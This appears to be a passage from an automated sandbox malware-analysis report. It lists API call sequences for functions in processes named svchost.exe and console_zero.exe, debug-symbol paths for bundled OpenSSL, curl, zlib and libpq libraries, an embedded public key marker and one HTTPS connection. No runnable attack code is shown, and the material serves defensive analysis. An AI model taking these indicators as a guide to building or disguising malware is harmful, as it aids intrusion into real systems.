    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE325A0 CRYPTO_strdup,CRYPTO_free,46_2_00007FFA2CE325A0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CEAC5A0 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_strndup,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_memdup,OPENSSL_cleanse,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,46_2_00007FFA2CEAC5A0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE48580 CRYPTO_malloc,CRYPTO_realloc,memset,OSSL_PARAM_locate_const,CRYPTO_free,CRYPTO_strdup,OSSL_PARAM_locate_const,CRYPTO_free,CRYPTO_strdup,OSSL_PARAM_locate_const,OSSL_PARAM_get_uint,OSSL_PARAM_locate_const,OSSL_PARAM_get_uint,OSSL_PARAM_locate_const,CRYPTO_free,CRYPTO_strdup,OSSL_PARAM_locate_const,CRYPTO_free,CRYPTO_strdup,OSSL_PARAM_locate_const,CRYPTO_free,CRYPTO_strdup,OSSL_PARAM_locate_const,CRYPTO_free,CRYPTO_strdup,OSSL_PARAM_locate_const,CRYPTO_free,CRYPTO_strdup,OSSL_PARAM_locate_const,CRYPTO_free,CRYPTO_strdup,OSSL_PARAM_locate_const,CRYPTO_free,CRYPTO_strdup,OSSL_PARAM_locate_const,OSSL_PARAM_get_int,OSSL_PARAM_locate_const,OSSL_PARAM_get_int,ERR_new,ERR_set_mark,EVP_KEYMGMT_fetch,X509_STORE_CTX_get0_param,OBJ_create,OBJ_txt2nid,OBJ_txt2nid,OBJ_nid2obj,OBJ_create,OBJ_create,OBJ_create,OBJ_txt2nid,OBJ_txt2nid,OBJ_txt2nid,OBJ_add_sigid,EVP_KEYMGMT_free,ERR_pop_to_mark,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,46_2_00007FFA2CE48580
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE5E510 memcmp,CRYPTO_memdup,ERR_new,ERR_set_debug,ERR_set_error,ERR_set_debug,OSSL_ERR_STATE_new,OSSL_ERR_STATE_save,CRYPTO_free,46_2_00007FFA2CE5E510
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CEA2500 CRYPTO_malloc,ERR_new,ERR_set_debug,memcpy,46_2_00007FFA2CEA2500
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE324D0 CRYPTO_free,CRYPTO_free,OPENSSL_sk_pop_free,CRYPTO_free,46_2_00007FFA2CE324D0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE6E660 CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,46_2_00007FFA2CE6E660
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE44660 CRYPTO_free,CRYPTO_malloc,memcpy,46_2_00007FFA2CE44660
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE72630 OPENSSL_cleanse,CRYPTO_free,46_2_00007FFA2CE72630
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE92630 CRYPTO_memdup,CRYPTO_memdup,CRYPTO_memdup,CRYPTO_free,CRYPTO_free,CRYPTO_free,46_2_00007FFA2CE92630
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE3C610 ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,EVP_MD_get_size,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_zalloc,CRYPTO_malloc,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,memcpy,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_insert,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,EVP_PKEY_free,EVP_PKEY_free,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,X509_free,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,X509_free,OPENSSL_sk_new_null,OPENSSL_sk_push,ERR_new,ERR_set_debug,ERR_set_error,X509_free,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,X509_free,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,46_2_00007FFA2CE3C610
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE6A5C0 OPENSSL_LH_retrieve,CRYPTO_zalloc,OPENSSL_LH_new,OPENSSL_LH_set_thunks,OPENSSL_LH_insert,OPENSSL_LH_error,OPENSSL_LH_free,CRYPTO_free,46_2_00007FFA2CE6A5C0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE827B0 CRYPTO_malloc,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,46_2_00007FFA2CE827B0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE7E790 CRYPTO_free,46_2_00007FFA2CE7E790
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE70770 CRYPTO_clear_free,CRYPTO_free,46_2_00007FFA2CE70770
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE72740 CRYPTO_zalloc,CRYPTO_zalloc,CRYPTO_zalloc,OPENSSL_cleanse,CRYPTO_free,46_2_00007FFA2CE72740
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE7E730 CRYPTO_free,46_2_00007FFA2CE7E730
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE28720 CRYPTO_free,CRYPTO_strdup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,46_2_00007FFA2CE28720
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE6C700 CRYPTO_malloc,memcmp,memcpy,memcpy,46_2_00007FFA2CE6C700
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE2E700 CRYPTO_malloc,OPENSSL_sk_find,CRYPTO_free,ERR_new,ERR_set_debug,OPENSSL_sk_push,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_set_error,46_2_00007FFA2CE2E700
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE7E6D0 CRYPTO_malloc,46_2_00007FFA2CE7E6D0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE4A8B0 EVP_PKEY_new,CRYPTO_malloc,CRYPTO_malloc,ERR_set_mark,EVP_PKEY_set_type,EVP_PKEY_CTX_new_from_pkey,EVP_PKEY_CTX_free,OBJ_txt2nid,OBJ_txt2nid,OBJ_txt2nid,ERR_pop_to_mark,CRYPTO_free,CRYPTO_free,EVP_PKEY_free,46_2_00007FFA2CE4A8B0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE668B0 CRYPTO_zalloc,CRYPTO_free,46_2_00007FFA2CE668B0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CEAA8B0 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,OPENSSL_sk_free,OPENSSL_sk_free,CRYPTO_free,CRYPTO_free,memcmp,OPENSSL_sk_num,OPENSSL_sk_value,ERR_new,OPENSSL_sk_num,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,memcpy,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_num,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_memcmp,ERR_new,ERR_set_debug,ERR_new,OPENSSL_sk_free,OPENSSL_sk_dup,OPENSSL_sk_free,OPENSSL_sk_dup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_num,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_free,ERR_new,OPENSSL_sk_free,OPENSSL_sk_free,CRYPTO_free,CRYPTO_free,46_2_00007FFA2CEAA8B0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CEAC890 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_malloc,ERR_new,ERR_set_debug,EVP_PKEY_CTX_new_from_pkey,ERR_new,ERR_set_debug,EVP_PKEY_decrypt_init,EVP_PKEY_CTX_set_rsa_padding,OSSL_PARAM_construct_uint32,OSSL_PARAM_construct_uint32,OSSL_PARAM_construct_end,EVP_PKEY_CTX_set_params,EVP_PKEY_decrypt,OPENSSL_cleanse,ERR_new,ERR_new,ERR_new,ERR_set_debug,CRYPTO_free,EVP_PKEY_CTX_free,46_2_00007FFA2CEAC890
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE2E880 CRYPTO_THREAD_run_once,46_2_00007FFA2CE2E880
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE92880 CRYPTO_free,CRYPTO_free,CRYPTO_free,46_2_00007FFA2CE92880
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE22860 CRYPTO_zalloc,InitializeCriticalSection,46_2_00007FFA2CE22860
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE7A850 CRYPTO_free,CRYPTO_free,CRYPTO_free,46_2_00007FFA2CE7A850
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE78850 CRYPTO_realloc,46_2_00007FFA2CE78850
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE44840 memcpy,CRYPTO_THREAD_read_lock,OPENSSL_LH_retrieve,CRYPTO_THREAD_unlock,CRYPTO_THREAD_unlock,46_2_00007FFA2CE44840
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE6E810 CRYPTO_zalloc,46_2_00007FFA2CE6E810
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE28812 ERR_set_debug,CRYPTO_free,CRYPTO_strdup,ERR_new,46_2_00007FFA2CE28812
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE74800 OPENSSL_LH_delete,CRYPTO_free,46_2_00007FFA2CE74800
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE227F0 DeleteCriticalSection,CRYPTO_free,46_2_00007FFA2CE227F0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE9C7E0 ERR_new,ERR_new,ERR_set_debug,EVP_PKEY_get1_encoded_public_key,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,EVP_PKEY_free,BN_num_bits,BN_bn2bin,CRYPTO_free,CRYPTO_strdup,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,CRYPTO_clear_free,CRYPTO_clear_free,46_2_00007FFA2CE9C7E0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE707D0 CRYPTO_malloc,memcpy,CRYPTO_free,46_2_00007FFA2CE707D0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE6A7D0 OPENSSL_LH_set_down_load,OPENSSL_LH_doall_arg,OPENSSL_LH_free,OPENSSL_LH_free,CRYPTO_free,46_2_00007FFA2CE6A7D0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE767D1 BIO_puts,BIO_puts,CRYPTO_zalloc,BIO_printf,BIO_printf,BIO_printf,BIO_printf,BIO_printf,BIO_printf,CRYPTO_free,BIO_puts,46_2_00007FFA2CE767D1
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE741B0 OPENSSL_LH_retrieve,CRYPTO_zalloc,OPENSSL_LH_insert,46_2_00007FFA2CE741B0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE36190 CRYPTO_malloc,CRYPTO_free,46_2_00007FFA2CE36190
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE8C190 CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_set_debug,46_2_00007FFA2CE8C190
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CEA6190 ERR_new,ERR_set_debug,CRYPTO_memcmp,ERR_new,ERR_new,ERR_new,ERR_new,ERR_set_debug,ERR_new,d2i_PUBKEY_ex,EVP_PKEY_missing_parameters,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_new,ERR_set_debug,CRYPTO_free,EVP_PKEY_free,46_2_00007FFA2CEA6190
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE78160 CRYPTO_memdup,46_2_00007FFA2CE78160
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE44160 CRYPTO_THREAD_write_lock,CRYPTO_THREAD_unlock,46_2_00007FFA2CE44160
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE9B140 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_get1_encoded_public_key,ERR_new,ERR_set_debug,EVP_PKEY_free,EVP_PKEY_get_size,ERR_new,ERR_set_debug,memset,ERR_new,ERR_set_debug,CRYPTO_free,EVP_PKEY_free,46_2_00007FFA2CE9B140
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE39120 memcpy,CRYPTO_THREAD_read_lock,OPENSSL_LH_retrieve,CRYPTO_THREAD_unlock,46_2_00007FFA2CE39120
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE71127 CRYPTO_realloc,46_2_00007FFA2CE71127
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE5D100 CRYPTO_free,46_2_00007FFA2CE5D100
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE7F0F0 ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_malloc,CRYPTO_memdup,CRYPTO_free,CRYPTO_free,CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,BIO_clear_flags,BIO_set_flags,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,memcpy,46_2_00007FFA2CE7F0F0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE910E0 CRYPTO_free,CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,46_2_00007FFA2CE910E0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE550D0 CRYPTO_free,CRYPTO_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,46_2_00007FFA2CE550D0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CEA92A0 EVP_MD_get_size,ERR_new,ERR_set_debug,RAND_bytes_ex,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,46_2_00007FFA2CEA92A0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE6F290 CRYPTO_realloc,46_2_00007FFA2CE6F290
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE25240 CRYPTO_zalloc,CRYPTO_free,46_2_00007FFA2CE25240
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE2321D X509_VERIFY_PARAM_get0_peername,ASYNC_WAIT_CTX_get_status,BIO_clear_flags,BIO_set_init,CRYPTO_free,CRYPTO_zalloc,BIO_set_init,BIO_set_data,BIO_clear_flags,X509_VERIFY_PARAM_get0_peername,BIO_set_shutdown,BIO_push,BIO_set_next,BIO_up_ref,BIO_set_init,46_2_00007FFA2CE2321D
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE63220 CRYPTO_zalloc,CRYPTO_free,46_2_00007FFA2CE63220
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE41210 BIO_s_file,BIO_new,ERR_new,ERR_set_debug,BIO_ctrl,ERR_new,ERR_set_debug,strncmp,ERR_new,ERR_set_debug,strncmp,CRYPTO_realloc,memcpy,CRYPTO_free,CRYPTO_free,CRYPTO_free,PEM_read_bio,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,BIO_free,46_2_00007FFA2CE41210
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE73200 OPENSSL_LH_retrieve,OPENSSL_LH_insert,OPENSSL_LH_delete,CRYPTO_free,46_2_00007FFA2CE73200
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE551E0 BN_dup,BN_dup,BN_dup,BN_dup,BN_dup,BN_dup,BN_dup,BN_dup,CRYPTO_strdup,CRYPTO_strdup,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,46_2_00007FFA2CE551E0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE751D0 CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_set_error,BIO_up_ref,ERR_new,ERR_set_debug,ERR_set_error,BIO_free,ERR_new,ERR_set_debug,EVP_CIPHER_is_a,EVP_CIPHER_is_a,EVP_CIPHER_is_a,EVP_MD_up_ref,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,EVP_MD_free,ERR_new,ERR_set_debug,ERR_set_error,BIO_free,CRYPTO_free,46_2_00007FFA2CE751D0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE213A0 CRYPTO_free,46_2_00007FFA2CE213A0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE993A0 ERR_new,ERR_set_debug,CRYPTO_clear_free,46_2_00007FFA2CE993A0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE73380 CRYPTO_free,46_2_00007FFA2CE73380
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE9B370 ERR_new,ERR_set_debug,EVP_PKEY_CTX_new_from_pkey,ERR_new,ERR_set_debug,CRYPTO_malloc,RAND_bytes_ex,EVP_MD_CTX_new,OBJ_nid2sn,EVP_get_digestbyname,EVP_DigestInit,EVP_DigestUpdate,EVP_DigestUpdate,EVP_DigestFinal_ex,EVP_MD_CTX_free,EVP_PKEY_CTX_free,ERR_new,ERR_set_debug,EVP_PKEY_CTX_free,CRYPTO_clear_free,EVP_MD_CTX_free,46_2_00007FFA2CE9B370
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE2D360 CRYPTO_zalloc,CRYPTO_zalloc,CRYPTO_free,46_2_00007FFA2CE2D360
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE37360 CRYPTO_free_ex_data,CRYPTO_THREAD_lock_free,CRYPTO_free,46_2_00007FFA2CE37360
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CEA5360 ERR_new,i2d_PUBKEY,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_set_debug,CRYPTO_free,46_2_00007FFA2CEA5360
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE4D310 CRYPTO_malloc,CRYPTO_free,CRYPTO_free,CRYPTO_free,46_2_00007FFA2CE4D310
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE492F0 CRYPTO_realloc,memcpy,46_2_00007FFA2CE492F0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE5B2D0 CRYPTO_free,46_2_00007FFA2CE5B2D0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE432C0 CRYPTO_THREAD_write_lock,OPENSSL_LH_insert,OPENSSL_LH_retrieve,OPENSSL_LH_retrieve,OPENSSL_LH_delete,CRYPTO_THREAD_unlock,46_2_00007FFA2CE432C0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE5B4B0 CRYPTO_zalloc,46_2_00007FFA2CE5B4B0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE8B4A0 CRYPTO_free,CRYPTO_free,46_2_00007FFA2CE8B4A0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE4D440 CRYPTO_free,CRYPTO_zalloc,OBJ_txt2nid,CONF_parse_list,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_malloc,memcpy,CRYPTO_free,CRYPTO_free,46_2_00007FFA2CE4D440
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE91430 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_strdup,ERR_new,ERR_set_debug,46_2_00007FFA2CE91430
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE8B420 CRYPTO_free,46_2_00007FFA2CE8B420
    Source: C:\Windows\System32\console_zero.exeCode function: 51_2_00007FFA3310E3C0 CryptAcquireContextW,CryptCreateHash,CryptReleaseContext,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,51_2_00007FFA3310E3C0
    Source: C:\Windows\System32\console_zero.exeCode function: 51_2_00007FFA3311C300 BCryptGenRandom,51_2_00007FFA3311C300
    Source: C:\Windows\System32\console_zero.exeCode function: 51_2_00007FFA3313E270 memcmp,memcmp,CryptQueryObject,CertAddCertificateContextToStore,CertFreeCertificateContext,GetLastError,GetLastError,51_2_00007FFA3313E270
    Source: C:\Windows\System32\console_zero.exeCode function: 51_2_00007FFA33123110 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,51_2_00007FFA33123110
    Source: C:\Windows\System32\console_zero.exeCode function: 51_2_00007FFA331231A0 CryptAcquireContextW,CryptCreateHash,CryptReleaseContext,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,51_2_00007FFA331231A0
    Source: C:\Windows\System32\console_zero.exeCode function: 51_2_00007FFA330F1180 CryptAcquireContextW,CryptImportKey,CryptReleaseContext,CryptEncrypt,CryptDestroyKey,CryptReleaseContext,51_2_00007FFA330F1180
    Source: C:\Windows\System32\console_zero.exeCode function: 51_2_00007FFA3313E7A0 CertGetNameStringW,CertFindExtension,CryptDecodeObjectEx,51_2_00007FFA3313E7A0
    Source: C:\Windows\System32\console_zero.exeCode function: 51_2_00007FFA3313B4E0 memset,CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,51_2_00007FFA3313B4E0
    Source: C:\Windows\System32\console_zero.exeCode function: 51_2_00007FFA3310E4F0 CryptAcquireContextW,CryptCreateHash,CryptReleaseContext,51_2_00007FFA3310E4F0
    Source: C:\Windows\System32\console_zero.exeCode function: 51_2_00007FFA3311C4D0 memset,BCryptGenRandom,51_2_00007FFA3311C4D0
    Source: C:\Windows\System32\console_zero.exeCode function: 51_2_00007FFA3310E570 CryptHashData,51_2_00007FFA3310E570
    Source: C:\Windows\System32\console_zero.exeCode function: 51_2_00007FFA3310E580 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,51_2_00007FFA3310E580
    Source: C:\Windows\System32\console_zero.exeCode function: 51_2_00007FFA3313BA86 wcschr,wcsncmp,wcsncmp,wcsncmp,wcsncmp,wcsncmp,wcsncmp,wcsncmp,wcsncmp,wcschr,CertOpenStore,GetLastError,free,free,CryptStringToBinaryW,free,CertFindCertificateInStore,free,CertFreeCertificateContext,CertCloseStore,free,fseek,ftell,fread,fclose,fseek,fclose,MultiByteToWideChar,PFXImportCertStore,GetLastError,CertFindCertificateInStore,GetLastError,CertCloseStore,strchr,strncmp,strncmp,strncmp,strncmp,strncmp,strtol,strchr,strncmp,strncmp,strncmp,strchr,CertFreeCertificateContext,free,51_2_00007FFA3313BA86
    Source: C:\Windows\System32\console_zero.exeCode function: 51_2_00007FFA33123090 CryptAcquireContextW,CryptCreateHash,CryptReleaseContext,51_2_00007FFA33123090
    Source: C:\Windows\System32\console_zero.exeCode function: 51_2_00007FFA3313DE50 CertGetNameStringW,CertFindExtension,CryptDecodeObjectEx,free,CertFreeCertificateContext,51_2_00007FFA3313DE50
    Source: C:\Windows\System32\console_zero.exeCode function: -----BEGIN PUBLIC KEY-----51_2_00007FFA3313FA60
    Source: console_zero.exeBinary or memory string: -----BEGIN PUBLIC KEY-----
    Source: C:\Windows\System32\console_zero.exeCode function: mov dword ptr [rbp+04h], 424D53FFh51_2_00007FFA33124930
    Source: unknownHTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.17:49726 version: TLS 1.2
    Source: Binary string: C:\Program Files\vcpkg\buildtrees\curl\x64-windows-rel\lib\libcurl.pdb source: console_zero.exe, 00000033.00000002.2225221333.00007FFA33147000.00000002.00000001.01000000.00000016.sdmp, libcurl.dll.31.dr, usvc.dat.31.dr
    Source: Binary string: D:\a\postgresql-packaging-foundation\postgresql-packaging-foundation\postgresql-15.7\Release\libpq\libpq.pdbGG source: usvc.dat.31.dr
    Source: Binary string: vcruntime140d.amd64.pdb source: vcruntime140d.dll.31.dr, usvc.dat.31.dr
    Source: Binary string: vcruntime140d.amd64.pdb,,, source: vcruntime140d.dll.31.dr, usvc.dat.31.dr
    Source: Binary string: C:\Program Files\vcpkg\buildtrees\zlib\x64-windows-rel\zlib.pdb## source: console_zero.exe, 00000033.00000002.2226266010.00007FFA5112F000.00000002.00000001.01000000.0000001A.sdmp, zlib1.dll.31.dr, usvc.dat.31.dr
    Source: Binary string: C:\Program Files\vcpkg\buildtrees\openssl\x64-windows-rel\libcrypto-3-x64.pdb source: svchost.exe, 0000002E.00000002.2378540668.00007FFA243AB000.00000002.00000001.01000000.0000001B.sdmp, libcrypto-3-x64.dll.31.dr, usvc.dat.31.dr
    Source: Binary string: D:\a\postgresql-packaging-foundation\postgresql-packaging-foundation\postgresql-15.7\Release\libpq\libpq.pdb source: usvc.dat.31.dr
    Source: Binary string: D:\a\postgresql-packaging-foundation\postgresql-packaging-foundation\postgresql-16.3\Release\libpq\libpq.pdb source: svchost.exe, 0000002E.00000002.2389293768.00007FFA2CF18000.00000002.00000001.01000000.00000017.sdmp, libpq.dll.31.dr
    Source: Binary string: D:\a\postgresql-packaging-foundation\postgresql-packaging-foundation\postgresql-16.3\Release\libpq\libpq.pdbJJ source: svchost.exe, 0000002E.00000002.2389293768.00007FFA2CF18000.00000002.00000001.01000000.00000017.sdmp, libpq.dll.31.dr
    Source: Binary string: C:\Program Files\vcpkg\buildtrees\zlib\x64-windows-rel\zlib.pdb source: console_zero.exe, 00000033.00000002.2226266010.00007FFA5112F000.00000002.00000001.01000000.0000001A.sdmp, zlib1.dll.31.dr, usvc.dat.31.dr
    Source: Binary string: C:\Program Files\vcpkg\buildtrees\openssl\x64-windows-rel\libssl-3-x64.pdb source: svchost.exe, 0000002E.00000002.2387227676.00007FFA2CEB0000.00000002.00000001.01000000.00000018.sdmp, libssl-3-x64.dll.31.dr, usvc.dat.31.dr
    Source: Binary string: ucrtbased.pdb source: ucrtbased.dll.31.dr, usvc.dat.31.dr
    Source: Binary string: PrintUI.pdb source: xcopy.exe, 00000019.00000002.1799318566.000001A4BEA1C000.00000004.00000020.00020000.00000000.sdmp, printui.exe, 0000001B.00000000.1832292058.00007FF78DE32000.00000002.00000001.01000000.00000010.sdmp, printui.exe, 0000001F.00000002.2221772024.00007FF78DE32000.00000002.00000001.01000000.00000010.sdmp, printui.exe.25.dr
    Source: Binary string: C:\Program Files\vcpkg\buildtrees\openssl\x64-windows-rel\libssl-3-x64.pdb{{ source: svchost.exe, 0000002E.00000002.2387227676.00007FFA2CEB0000.00000002.00000001.01000000.00000018.sdmp, libssl-3-x64.dll.31.dr, usvc.dat.31.dr
    Source: Binary string: PrintUI.pdbGCTL source: xcopy.exe, 00000019.00000002.1799318566.000001A4BEA1C000.00000004.00000020.00020000.00000000.sdmp, printui.exe, 0000001B.00000000.1832292058.00007FF78DE32000.00000002.00000001.01000000.00000010.sdmp, printui.exe, 0000001F.00000002.2221772024.00007FF78DE32000.00000002.00000001.01000000.00000010.sdmp, printui.exe.25.dr
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA4185014C GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,CloseHandle,CloseHandle,46_2_00007FFA4185014C
